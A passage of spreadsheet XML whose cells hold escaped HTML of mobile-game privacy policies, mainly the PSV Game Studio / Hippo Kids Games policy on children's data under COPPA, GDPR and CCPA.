uot;uri&amp;quot;:&amp;quot;routes.logout&amp;quot;,&amp;quot;methods&amp;quot;:[&amp;quot;POST&amp;quot;]}}},&amp;quot;appTitle&amp;quot;:&amp;quot;Privacy&amp;quot;},&amp;quot;url&amp;quot;:&amp;quot;\/privacy&amp;quot;,&amp;quot;version&amp;quot;:&amp;quot;743b401854ff712bbd916afb7dbcab1d&amp;quot;}"&gt;&lt;/div&gt;&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>We will notify you of any changes by posting the new Privacy Policy on this page.&lt;br&gt;
            This policy is effective as of 2020-07-08
        &lt;/p&gt;
        &lt;p&gt;&lt;b&gt;Contact Us&lt;/b&gt;&lt;br&gt;
            If you have any questions or suggestions about our Privacy Policy, do not hesitate to contact us at &lt;a href="/cdn-cgi/l/email-protection#9ce5f3eaf3f7f5f8efdcfbf1fdf5f0b2fff3f1"&gt;&lt;span class="__cf_email__" data-cfemail="fc85938a939795988fbc9b919d9590d29f9391"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;.
        &lt;/p&gt;
    &lt;/div&gt;
&lt;/div&gt;
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script type="text/javascript"&gt;
    var height = document.getElementsByClassName("topnav")[0].clientHeight;
    document.getElementById("1-1").style.marginTop = height + "px";
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;html&gt;&lt;head&gt;&lt;meta content="text/html; charset=UTF-8" http-equiv="content-type"&gt;&lt;style type="text/css"&gt;ol.lst-kix_list_1-3{list-style-type:none}ol.lst-kix_list_1-4{list-style-type:none}.lst-kix_list_2-6&gt;li:before{content:"" counter(lst-ctn-kix_list_2-0,decimal) "." counter(lst-ctn-kix_list_2-1,decimal) "." counter(lst-ctn-kix_list_2-2,decimal) "."</t>
  </si>
  <si>
    <t>counter(lst-ctn-kix_list_2-3,decimal) "." counter(lst-ctn-kix_list_2-4,decimal) "." counter(lst-ctn-kix_list_2-5,decimal) "."</t>
  </si>
  <si>
    <t>counter(lst-ctn-kix_list_2-6,decimal) ". "}.lst-kix_list_2-7&gt;li:before{content:"" counter(lst-ctn-kix_list_2-0,decimal) "." counter(lst-ctn-kix_list_2-1,decimal) "."</t>
  </si>
  <si>
    <t>counter(lst-ctn-kix_list_2-2,decimal) "." counter(lst-ctn-kix_list_2-3,decimal) "." counter(lst-ctn-kix_list_2-4,decimal) "."</t>
  </si>
  <si>
    <t>counter(lst-ctn-kix_list_2-5,decimal) "." counter(lst-ctn-kix_list_2-6,decimal) "."</t>
  </si>
  <si>
    <t>counter(lst-ctn-kix_list_2-7,decimal) ". "}.lst-kix_list_2-7&gt;li{counter-increment:lst-ctn-kix_list_2-7}ol.lst-kix_list_1-5{list-style-type:none}ol.lst-kix_list_1-6{list-style-type:none}.lst-kix_list_2-1&gt;li{counter-increment:lst-ctn-kix_list_2-1}ol.lst-kix_list_1-0{list-style-type:none}.lst-kix_list_2-4&gt;li:before{content:"" counter(lst-ctn-kix_list_2-0,decimal) "." counter(lst-ctn-kix_list_2-1,decimal) "."</t>
  </si>
  <si>
    <t>counter(lst-ctn-kix_list_2-2,decimal) "." counter(lst-ctn-kix_list_2-3,decimal) "." counter(lst-ctn-kix_list_2-4,decimal) ".</t>
  </si>
  <si>
    <t>"}.lst-kix_list_2-5&gt;li:before{content:"" counter(lst-ctn-kix_list_2-0,decimal) "." counter(lst-ctn-kix_list_2-1,decimal) "." counter(lst-ctn-kix_list_2-2,decimal) "."</t>
  </si>
  <si>
    <t>counter(lst-ctn-kix_list_2-3,decimal) "." counter(lst-ctn-kix_list_2-4,decimal) "." counter(lst-ctn-kix_list_2-5,decimal) ".</t>
  </si>
  <si>
    <t>"}.lst-kix_list_2-8&gt;li:before{content:"" counter(lst-ctn-kix_list_2-0,decimal) "." counter(lst-ctn-kix_list_2-1,decimal) "." counter(lst-ctn-kix_list_2-2,decimal) "."</t>
  </si>
  <si>
    <t>counter(lst-ctn-kix_list_2-6,decimal) "." counter(lst-ctn-kix_list_2-7,decimal) "."</t>
  </si>
  <si>
    <t>counter(lst-ctn-kix_list_2-8,decimal) ". "}ol.lst-kix_list_1-1{list-style-type:none}ol.lst-kix_list_1-2{list-style-type:none}.lst-kix_list_1-1&gt;li{counter-increment:lst-ctn-kix_list_1-1}ol.lst-kix_list_2-6.start{counter-reset:lst-ctn-kix_list_2-6 0}ol.lst-kix_list_1-8.start{counter-reset:lst-ctn-kix_list_1-8 0}ol.lst-kix_list_2-3.start{counter-reset:lst-ctn-kix_list_2-3 0}ol.lst-kix_list_1-5.start{counter-reset:lst-ctn-kix_list_1-5 0}ol.lst-kix_list_1-7{list-style-type:none}.lst-kix_list_1-7&gt;li{counter-increment:lst-ctn-kix_list_1-7}ol.lst-kix_list_1-8{list-style-type:none}ol.lst-kix_list_2-5.start{counter-reset:lst-ctn-kix_list_2-5 0}.lst-kix_list_2-0&gt;li{counter-increment:lst-ctn-kix_list_2-0}.lst-kix_list_2-3&gt;li{counter-increment:lst-ctn-kix_list_2-3}.lst-kix_list_2-6&gt;li{counter-increment:lst-ctn-kix_list_2-6}ol.lst-kix_list_1-7.start{counter-reset:lst-ctn-kix_list_1-7 0}.lst-kix_list_1-2&gt;li{counter-increment:lst-ctn-kix_list_1-2}ol.lst-kix_list_2-2.start{counter-reset:lst-ctn-kix_list_2-2 0}.lst-kix_list_1-5&gt;li{counter-increment:lst-ctn-kix_list_1-5}.lst-kix_list_1-8&gt;li{counter-increment:lst-ctn-kix_list_1-8}ol.lst-kix_list_1-4.start{counter-reset:lst-ctn-kix_list_1-4 0}ol.lst-kix_list_1-1.start{counter-reset:lst-ctn-kix_list_1-1 0}ol.lst-kix_list_2-2{list-style-type:none}ol.lst-kix_list_2-3{list-style-type:none}ol.lst-kix_list_2-4{list-style-type:none}ol.lst-kix_list_2-5{list-style-type:none}.lst-kix_list_1-4&gt;li{counter-increment:lst-ctn-kix_list_1-4}ol.lst-kix_list_2-0{list-style-type:none}.lst-kix_list_2-4&gt;li{counter-increment:lst-ctn-kix_list_2-4}ol.lst-kix_list_1-6.start{counter-reset:lst-ctn-kix_list_1-6 0}ol.lst-kix_list_2-1{list-style-type:none}ol.lst-kix_list_1-3.start{counter-reset:lst-ctn-kix_list_1-3 0}ol.lst-kix_list_2-8.start{counter-reset:lst-ctn-kix_list_2-8</t>
  </si>
  <si>
    <t>0}ol.lst-kix_list_1-2.start{counter-reset:lst-ctn-kix_list_1-2 0}.lst-kix_list_1-0&gt; li:before{content:"" counter(lst-ctn-kix_list_1-0,decimal) ". "}ol.lst-kix_list_2-6{list-style-type:none}.lst-kix_list_1-1&gt;li:before{content:" "}.lst-kix_list_1-2&gt;li:before{content:" "}ol.lst-kix_list_2-0.start{counter-reset:lst-ctn-kix_list_2-0 0}ol.lst-kix_list_2-7{list-style-type:none}ol.lst-kix_list_2-8{list-style-type:none}.lst-kix_list_1-3&gt;li:before{content:" "}.lst-kix_list_1-4&gt;li:before{content:" "}ol.lst-kix_list_1-0.start{counter-reset:lst-ctn-kix_list_1-0 0}.lst-kix_list_1-0&gt;li{counter-increment:lst-ctn-kix_list_1-0}.lst-kix_list_1-6&gt;li{counter-increment:lst-ctn-kix_list_1-6}.lst-kix_list_1-7&gt;li:before{content:" "}ol.lst-kix_list_2-7.start{counter-reset:lst-ctn-kix_list_2-7 0}.lst-kix_list_1-3&gt;li{counter-increment:lst-ctn-kix_list_1-3}.lst-kix_list_1-5&gt;li:before{content:" "}.lst-kix_list_1-6&gt;li:before{content:" "}.lst-kix_list_2-0&gt;li:before{content:"" counter(lst-ctn-kix_list_2-0,decimal) ".</t>
  </si>
  <si>
    <t>"}.lst-kix_list_2-1&gt;li:before{content:"" counter(lst-ctn-kix_list_2-0,decimal) "." counter(lst-ctn-kix_list_2-1,decimal) ". "}ol.lst-kix_list_2-1.start{counter-reset:lst-ctn-kix_list_2-1 0}.lst-kix_list_2-5&gt;li{counter-increment:lst-ctn-kix_list_2-5}.lst-kix_list_2-8&gt;li{counter-increment:lst-ctn-kix_list_2-8}.lst-kix_list_1-8&gt;li:before{content:" "}.lst-kix_list_2-2&gt;li:before{content:"" counter(lst-ctn-kix_list_2-0,decimal) "."</t>
  </si>
  <si>
    <t>counter(lst-ctn-kix_list_2-1,decimal) "." counter(lst-ctn-kix_list_2-2,decimal) ". "}.lst-kix_list_2-3&gt;li:before{content:"" counter(lst-ctn-kix_list_2-0,decimal) "."</t>
  </si>
  <si>
    <t>counter(lst-ctn-kix_list_2-1,decimal) "." counter(lst-ctn-kix_list_2-2,decimal) "." counter(lst-ctn-kix_list_2-3,decimal) ".</t>
  </si>
  <si>
    <t>"}.lst-kix_list_2-2&gt;li{counter-increment:lst-ctn-kix_list_2-2}ol.lst-kix_list_2-4.start{counter-reset:lst-ctn-kix_list_2-4 0}ol{margin:0;padding:0}table td,table th{padding:0}.c13{border-right-style:solid;padding:7.5pt 7.5pt 7.5pt 5.5pt;border-bottom-color:#000000;border-top-width:1pt;border-right-width:1pt;border-left-color:#000000;vertical-align:middle;border-right-color:#000000;border-left-width:1pt;border-top-style:solid;background-color:#ffffff;border-left-style:solid;border-bottom-width:1pt;width:112.7pt;border-top-color:#000000;border-bottom-style:solid}.c9{border-right-style:solid;padding:7.5pt 7.5pt 7.5pt 5.5pt;border-bottom-color:#000000;border-top-width:1pt;border-right-width:1pt;border-left-color:#000000;vertical-align:middle;border-right-color:#000000;border-left-width:1pt;border-top-style:solid;background-color:#ffffff;border-left-style:solid;border-bottom-width:1pt;width:265pt;border-top-color:#000000;border-bottom-style:solid}.c2{border-right-style:solid;padding:7.5pt 7.5pt 7.5pt 5.5pt;border-bottom-color:#000000;border-top-width:1pt;border-right-width:1pt;border-left-color:#000000;vertical-align:middle;border-right-color:#000000;border-left-width:1pt;border-top-style:solid;background-color:#ffffff;border-left-style:solid;border-bottom-width:1pt;width:72.8pt;border-top-color:#000000;border-bottom-style:solid}.c15{-webkit-text-decoration-skip:none;color:#000000;font-weight:400;text-decoration:underline;vertical-align:baseline;text-decoration-skip-ink:none;font-size:11pt;font-family:"Arial";font-style:normal}.c6{margin-left:53.5pt;padding-top:0pt;padding-left:17.5pt;padding-bottom:0pt;line-height:1.1500000000000001;orphans:2;widows:2;text-align:justify}.c3{margin-left:18pt;padding-top:0pt;padding-left:17.5pt;padding-bottom:0pt;line-height:1.1500000000000001;orphans:2;widows:2;text-align:justify}.c11{margin-left:53.5pt;padding-top:0pt;padding-left:17.5pt;padding-bottom:10pt;line-height:1.1500000000000001;orphans:2;widows:2;text-align:left}.c25{color:#00000a;font-weight:400;text-decoration:none;vertical-align:baseline;font-size:10.5pt;font-family:"Arial";font-style:normal}.c16{color:#00000a;font-weight:700;text-decoration:none;vertical-align:baseline;font-size:14pt;font-family:"Arial";font-style:normal}.c0{color:#00000a;font-weight:400;text-decoration:none;vertical-align:baseline;font-size:11pt;font-family:"Arial";font-style:normal}.c1{color:#00000a;font-weight:700;text-decoration:none;vertical-align:baseline;font-size:11pt;font-family:"Arial";font-style:normal}.c4{color:#000000;font-weight:400;text-decoration:none;vertical-align:baseline;font-size:11pt;font-family:"Arial";font-style:normal}.c23{font-weight:700;text-decoration:none;vertical-align:baseline;font-size:11pt;font-family:"Arial";font-style:normal}.c18{margin-left:35.5pt;padding-top:0pt;padding-bottom:0pt;line-height:1.1500000000000001;text-align:justify}.c30{padding-top:0pt;padding-bottom:10pt;line-height:1.1500000000000001;text-align:left}.c14{padding-top:0pt;padding-bottom:8pt;line-height:1.1500000000000001;text-align:center}.c32{margin-left:-5.5pt;border-spacing:0;border-collapse:collapse;margin-right:auto}.c28{padding-top:0pt;padding-bottom:0pt;line-height:1.1500000000000001;text-align:justify}.c8{padding-top:0pt;padding-bottom:8pt;line-height:1.1500000000000001;text-align:justify}.c31{background-color:#ffffff;max-width:484.5pt;padding:56.7pt 42.5pt 56.7pt 85pt}.c10{margin-left:34.9pt;orphans:2;widows:2}.c12{orphans:2;widows:2;height:11pt}.c24{color:#00000a;font-size:11pt}.c20{margin-left:70.9pt;text-indent:-36pt}.c5{color:inherit;text-decoration:inherit}.c17{orphans:2;widows:2}.c29{margin-left:53.5pt;padding-left:17.5pt}.c19{margin-left:18pt;padding-left:17.5pt}.c7{padding:0;margin:0}.c26{height:0pt}.c21{color:#000000}.c27{font-weight:700}.c22{margin-left:70.9pt}.title{padding-top:24pt;color:#00000a;font-weight:700;font-size:36pt;padding-bottom:6pt;font-family:"Arial";line-height:1.1500000000000001;page-break-after:avoid;orphans:2;widows:2;text-align:justify}.subtitle{padding-top:18pt;color:#666666;font-size:24pt;padding-bottom:4pt;font-family:"Georgia";line-height:1.1500000000000001;page-break-after:avoid;font-style:italic;orphans:2;widows:2;text-align:justify}li{color:#00000a;font-size:11pt;font-family:"Arial"}p{margin:0;color:#00000a;font-size:11pt;font-family:"Arial"}h1{padding-top:10pt;color:#000000;font-weight:700;font-size:12pt;padding-bottom:10pt;font-family:"Arial";line-height:1.1500000000000001;orphans:2;widows:2;text-align:justify}h2{padding-top:0pt;color:#00000a;font-weight:700;font-size:18pt;padding-bottom:8pt;font-family:"Times New Roman";line-height:1.0;orphans:2;widows:2;text-align:left}h3{padding-top:0pt;color:#00000a;font-weight:700;font-size:13.5pt;padding-bottom:8pt;font-family:"Times New Roman";line-height:1.0;orphans:2;widows:2;text-align:left}h4{padding-top:0pt;color:#00000a;font-weight:700;font-size:12pt;padding-bottom:8pt;font-family:"Times New Roman";line-height:1.0;orphans:2;widows:2;text-align:left}h5{padding-top:11pt;color:#00000a;font-weight:700;font-size:11pt;padding-bottom:2pt;font-family:"Arial";line-height:1.1500000000000001;page-break-after:avoid;orphans:2;widows:2;text-align:justify}h6{padding-top:10pt;color:#00000a;font-weight:700;font-size:10pt;padding-bottom:2pt;font-family:"Arial";line-height:1.1500000000000001;page-break-after:avoid;orphans:2;widows:2;text-align:justify}&lt;/style&gt;&lt;/head&gt;&lt;body class="c31"&gt;&lt;p class="c14 c17"&gt;&lt;span class="c16"&gt;PRIVACY POLICY&lt;/span&gt;&lt;/p&gt;&lt;p class="c14 c17"&gt;&lt;span&gt;Effective: &lt;/span&gt;&lt;span class="c24"&gt;December &lt;/span&gt;&lt;span&gt;1&lt;/span&gt;&lt;span class="c24"&gt;0&lt;/span&gt;&lt;span class="c0"&gt;, 2020&lt;/span&gt;&lt;/p&gt;&lt;p class="c8 c17"&gt;&lt;span&gt;PSV Game Studio is the direct owner of the developer account Hippo Kids Games.</t>
  </si>
  <si>
    <t>PSV Game Studio is a company registered and acting under the laws of Seychelles, together with its Affiliates, employees, officers and directors as applicable (collectively the &amp;ldquo;Company&amp;rdquo; or &amp;ldquo;we,&amp;rdquo; &amp;ldquo;us,&amp;rdquo; or &amp;ldquo;our&amp;rdquo;) provides family-friendly designated products and mobile technology and other child-friendly mobile applications (collectively the &amp;ldquo;Services&amp;rdquo;). Whenever you use the Services, you agree to be bound by all of the terms stipulated in this Privacy Policy, which is an integral part of the Terms of Use (hereinafter the &amp;ldquo;Terms&amp;rdquo;) available by the following link: &lt;/span&gt;&lt;span&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://policy.psvgamestudio.com/terms_of_use_hippo_kids_games.html&amp;amp;sa=D&amp;amp;ust=1607602738193000&amp;amp;usg=AOvVaw3Oo-YvqvU81t8qSSpqAgsi"&gt;https://policy.psvgamestudio.com/terms_of_use_hippo_kids_games.html&lt;/a&gt;&lt;/span&gt;&lt;span class="c0"&gt;. If you do not agree to all the terms and conditions stipulated in Terms and Privacy Policy, you shall not use our Services.&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-0 start" start="1"&gt;&lt;li class="c3"&gt;&lt;span class="c1"&gt;INTRODUCTION&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-1 start" start="1"&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;All terms used in this Privacy Policy shall have the same meaning as defined in our Terms, unless specifically indicated herein.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c17 c18"&gt;&lt;span class="c0"&gt;We use the broad interpretation of a term &amp;ldquo;Personal Information,&amp;rdquo; which includes combined definitions pf personal information from CCPA, COPPA, and GDPR.</t>
  </si>
  <si>
    <t>We treat any information relating to an identified or identifiable data subject as personal to the broadest extent. It includes but not limited to the information that identifies, relates to, describes, is capable of being associated with, or may reasonably be linked, directly or indirectly, with a particular consumer or household. We also treat pseudonymous data and depersonalized identifiers as Personal Information if they allow in combination to establish a link between such information and a patricidal consumer, or household, or if they can be used to recognize a user over time and across different websites or online services.&lt;/span&gt;&lt;span</t>
  </si>
  <si>
    <t>class="c4"&gt;&amp;nbsp;The complete list of the Personal Information that the Company processes is included in Schedule A below. Please note that the Schedule A is not applicable to children&amp;rsquo;s Personal Information.&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-1" start="2"&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;This Privacy Policy applies to the Companies&amp;rsquo; policies on collection, use and disclosure of personal and non-personal information by the Company and its affiliates through the sites and the mobile apps distributed by the Company (collectively the &amp;ldquo;Services&amp;rdquo;).</t>
  </si>
  <si>
    <t>This Privacy Policy does not apply to the collection, use or disclosure of personal and non-personal information through any apps for which the Company does not act as the publisher.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;By using the Services, you signify your assent to our Privacy Policy. If you do not agree to this Privacy Policy, please do not use any of our Services.&lt;/span&gt;&lt;/li&gt;&lt;li class="c8 c17 c19"&gt;&lt;span class="c0"&gt;We reserve the right to make changes to this Privacy Policy at any time. Please check the Privacy Policy each time you use our Services to ensure you are aware of any changes in our privacy practices.</t>
  </si>
  <si>
    <t>Our Privacy Policy will indicate the date it was last updated. Your continued use of our Services will signify your acceptance of the changes to our Privacy Policy. If there is a substantive or material change in the way that we use your Personal Information, we will notify you via email of the relevant changes or provide other prominent notice.</t>
  </si>
  <si>
    <t>If you choose to opt-out of or not opt-in to our changed practice, our email communication (if applicable) will contain instructions on how to do so. If such change affects children users, we will first notify and obtain the prior verifiable consent of a parent or legal guardian.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c8 c12"&gt;&lt;span class="c0"&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-0" start="2"&gt;&lt;li class="c3"&gt;&lt;span class="c1"&gt;LEGISLATION&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol</t>
  </si>
  <si>
    <t>class="c7 lst-kix_list_2-1 start" start="1"&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;This Privacy Policy is drafted with adherence to the applicable privacy protection laws, including following legislation:&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-2 start" start="1"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;California Consumer Privacy Act (&amp;ldquo;CCPA&amp;rdquo;):&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c28 c17 c22"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=http://leginfo.legislature.ca.gov/faces/codes_displayText.xhtml?lawCode%3DCIV%26division%3D3.%26title%3D1.81.5.%26part%3D4.%26chapter%3D%26article%3D&amp;amp;sa=D&amp;amp;ust=1607602738195000&amp;amp;usg=AOvVaw1GX84Nj_uTAVhP_iQVrCQl"&gt;http://leginfo.legislature.ca.gov/faces/codes_displayText.xhtml?lawCode=CIV&amp;amp;division=3.&amp;amp;title=1.81.5.&amp;amp;part=4.&amp;amp;chapter=&amp;amp;article=&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-2" start="2"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Children&amp;#39;s Online Privacy Protection Rule (&amp;quot;COPPA&amp;quot;)&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c17 c22 c28"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://uscode.house.gov/view.xhtml?path%3D/prelim@title15/chapter91%26edition%3Dprelim&amp;amp;sa=D&amp;amp;ust=1607602738195000&amp;amp;usg=AOvVaw1ibRjxFnA98UgMN4qnvOD0"&gt;https://uscode.house.gov/view.xhtml?path=/&lt;span class="__cf_email__" data-cfemail="760604131a1f1b36021f021a134743"&gt;[email&amp;#160;protected]&lt;/span&gt;/chapter91&amp;amp;edition=prelim&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-2" start="3"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Regulation (EU) 2016/679 of the European Parliament and of the Council of 27 April 2016 on the protection of natural persons with regard to the processing of personal data and on the free movement of such data, and repealing Directive 95/46/EC (General Data Protection Regulation or &amp;ldquo;GDPR&amp;rdquo;)&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c8 c17 c22"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://eur-lex.europa.eu/eli/reg/2016/679/oj&amp;amp;sa=D&amp;amp;ust=1607602738196000&amp;amp;usg=AOvVaw0TkrFZDgyzmJSErWWHEgXD"&gt;https://eur-lex.europa.eu/eli/reg/2016/679/oj&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="c8 c12"&gt;&lt;span</t>
  </si>
  <si>
    <t>class="c1"&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-0" start="3"&gt;&lt;li class="c3" id="h.gjdgxs"&gt;&lt;span class="c1"&gt;ONLINE PRIVACY OF CHILDREN&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-1 start" start="1"&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;The Company adheres to the principles of the COPPA, a U.S. law designed to protect the online privacy of children, in our Services that are directed to children. If you would like to learn more about COPPA, you can refer to the &amp;ldquo;Children&amp;rsquo;s Privacy&amp;rdquo; section of the Federal Trade Commission&amp;rsquo;s website.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;The Company adheres to the principles of the GDPR, an EU law designed to protect and empower the owners of personal data (&amp;ldquo;data subjects&amp;rdquo;), in terms that regulated the privacy of children.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;The Company takes many precautions to protect the online privacy of children.</t>
  </si>
  <si>
    <t>Whenever we refer to &amp;ldquo;children&amp;rdquo; in this Privacy Policy, we mean children under the age of 13 (thirteen) for the United States and all other jurisdictions, except that it can be under the age of 16 (sixteen) for the EU member states unless member state established a different age limit, which cannot be lower than 13 (thirteen). Please help us in protecting children&amp;rsquo;s privacy by instructing them to never provide any Personal Information (full name, email address, home address, phone number, etc.) without your permission.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;Currently, THE COMPANY DOES NOT KNOWINGLY COLLECT ANY PERSONAL INFORMATION FROM CHILDREN OR</t>
  </si>
  <si>
    <t>WITHIN THE CHILD-ORIENTED PORTIONS OF OUR SERVICES except as otherwise outlined in this Privacy Policy. If we were to collect and store Personal Information from children, we would obtain a prior verifiable consent of a parent or legal guardian before such collection, unless the collection of information falls within a COPPA-permitted exception.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;In our Services directed to children users, we collect information which includes persistent identifiers such as a device identifier (&amp;ldquo;device ID&amp;rdquo;) or an Internet Protocol address (&amp;ldquo;IP address&amp;rdquo;). This information is collected solely for the purpose of providing functionality and support for our internal operations and optimizing our users&amp;rsquo; game experience.</t>
  </si>
  <si>
    <t>We never collect precise geo-location data from children and do not allow practices and/or mechanisms that mislead them into sharing such information.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;The Company does not permit behaviorally-targeted advertising to children in the Services where we do not have the substantial confirmation that the user is over the age of 13 (thirteen).&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;If we decide to change our policy regarding collection of Personal Information of children, we will receive your prior verifiable consent in all cases before such the collection.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;In case we detect the unintended collection of Personal Information from children, including cases when children voluntarily share their information, we may use this information only to respond directly to a child&amp;rsquo;s specific one-time request. COPPA permits not to make a direct notification is this case. We will not use the information to contact the child again and we will delete it after we respond to the request.</t>
  </si>
  <si>
    <t>In all other cases we will:&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-2 start" start="1"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;notify parents we collected their online contact information;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;notify parents we collected their child&amp;rsquo;s online contact information;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;notify parents the online contact information will not be used for any other purpose other than the one as determined in notification and will not be disclosed or combined with other information;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;notify parents that if they do not opt out, we may use the child&amp;rsquo;s online contact information for that purpose; and&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;hyperlink to this Privacy Policy.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-1" start="9"&gt;&lt;li class="c8 c17 c19"&gt;&lt;span class="c0"&gt;If you believe that we may have unintentionally collected your child&amp;rsquo;s Personal Information without your prior consent, you may contact the Company&amp;rsquo;s Privacy Officer by contacts stipulated in Section 10..&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c8 c12"&gt;&lt;span class="c0"&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-0" start="4"&gt;&lt;li class="c3"&gt;&lt;span class="c1"&gt;INFORMATION COLLECTED&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-1 start" start="1"&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;THE</t>
  </si>
  <si>
    <t>COMPANY&amp;rsquo;S POLICY IS NOT TO COLLECT PERSONAL INFORMATION FROM CHILDREN UNDER THE AGE OF 13 (THIRTEEN) YEARS OLD FOR THE UNITED STATES AND OTHER COUNTRIES, OR 16 (SIXTEEN) FOR THE EURIPEAN UNION, UNLESS OTHERWISE ESTABLISHED BY NATIONAL LAW.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;There are two types of information that may be collected by the Company:&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-2 start" start="1"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;the first is called Personal Information which is information that can be used to identify a specific individual. As stated in the previous section, the Company does not knowingly collect any Personal Information from children outside of the information and required for the support of internal operations. In this case we use the &amp;ldquo;email plus&amp;rdquo; method, when we send an email to the parent or legal guardian and have them respond with their consent.</t>
  </si>
  <si>
    <t>Then we send a confirmation to the parent via email, letter, or phone call. In this case we also let the parent know they can revoke their consent anytime. The Company may collect Personal Information that parents, legal guardians or persons 13 (thirteen) years old or over voluntarily provide via the Services.&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;the second type of information is non-personal information which does not directly identify an individual.</t>
  </si>
  <si>
    <t>The Company may collect non-personal information about your use of the Services to help us improve our Services or for other purposes as described in this Privacy Policy.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-1" start="3"&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;We may combine the non-personal information and Personal Information of people above 13 (thirteen) years old for the United States and other countries, or 16 (sixteen) for the European Union, unless otherwise established by national law that we receive through our Services. Information collected will vary depending upon the activity and may include your name, email address, phone number, mobile number, device type, operating system, home address, birth date, statistical and usage data (as further explained below), proof of identify (such as the Social Security, Social Identification Number or Social Insurance Number) of contest prize winners and, to the extent required to process any payment, your credit card information. In addition, we may collect demographic information such as gender, zip code or postal code and other data that you may provide in surveys or online profiles, for instance.</t>
  </si>
  <si>
    <t>We may combine demographic information with Personal Information.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;For EU only: per requirements under GDPR, we log your consent state for compliance purposes. This information is stored on servers hosted in the EU and is used solely for GDPR compliance. The device identifier is stored along with the consent status.</t>
  </si>
  <si>
    <t>If you consent to personalized advertising, your device advertising identifier also is stored in case we need to be able to access it to assist you with data portability or erasure requests. Your device advertising identifier is not stored in our consent logging database if you do not consent to personalized advertising.&lt;/span&gt;&lt;/li&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;Please note that this data is collected automatically by third parties (controllers or processors under GDPR) due to your use of our products if you accept this Privacy Policy:&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-2 start" start="1"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;data about your game progress;&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;your IP address and mobile device identifiers (such as your device ID, advertising ID, MAC address, IMEI);&lt;/span&gt;&lt;/li&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;data about your device, such as device name and operating system, browser type and 